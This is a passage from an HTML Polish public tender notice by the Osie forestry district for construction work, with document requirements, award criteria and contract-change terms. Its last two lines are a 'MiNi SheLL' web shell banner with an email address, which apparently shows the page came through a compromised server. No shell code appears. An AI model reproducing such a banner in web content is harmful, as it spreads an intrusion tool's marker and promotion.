<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy
b) kosztorys ofertowy sporządzony na podstawie dokumentacji projektowej - wg. zał. nr 2,      c) lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że nie należy do grupy kapitałowej, zał 9,
d) pełnomocnictwo podmiotów występujących wspólnie (konsorcjum),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiana terminu realizacji przedmiotu umowy spowodowana w szczególności:
- niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów itp.;
- koniecznością wykonania robót, których wykonanie w sposób obiektywny uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
- wstrzymaniem prac przez właściwe organy z przyczyn niezależnych od Wykonawcy;
Uwaga: Zmiana zakresu robót wymaga uzyskania akceptacji osób sprawujących nadzór inwestorski, a także zatwierdzenia do realizacji przez Zamawiającego i nie może skutkować przekroczeniem wynagrodzenia określonego na podstawie złożonej oferty. 
Zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu   umowy
 w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia np. ustawowa zmiana stawki VAT, czy z zakresu prawa budowlanego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.osie.torun.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Osie ul. Rynek 11, 86-150 Osie pokój nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2013 godzina 10:00, miejsce: Nadleśnictwo Osie ul. Rynek 11, 86-150 Osie pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com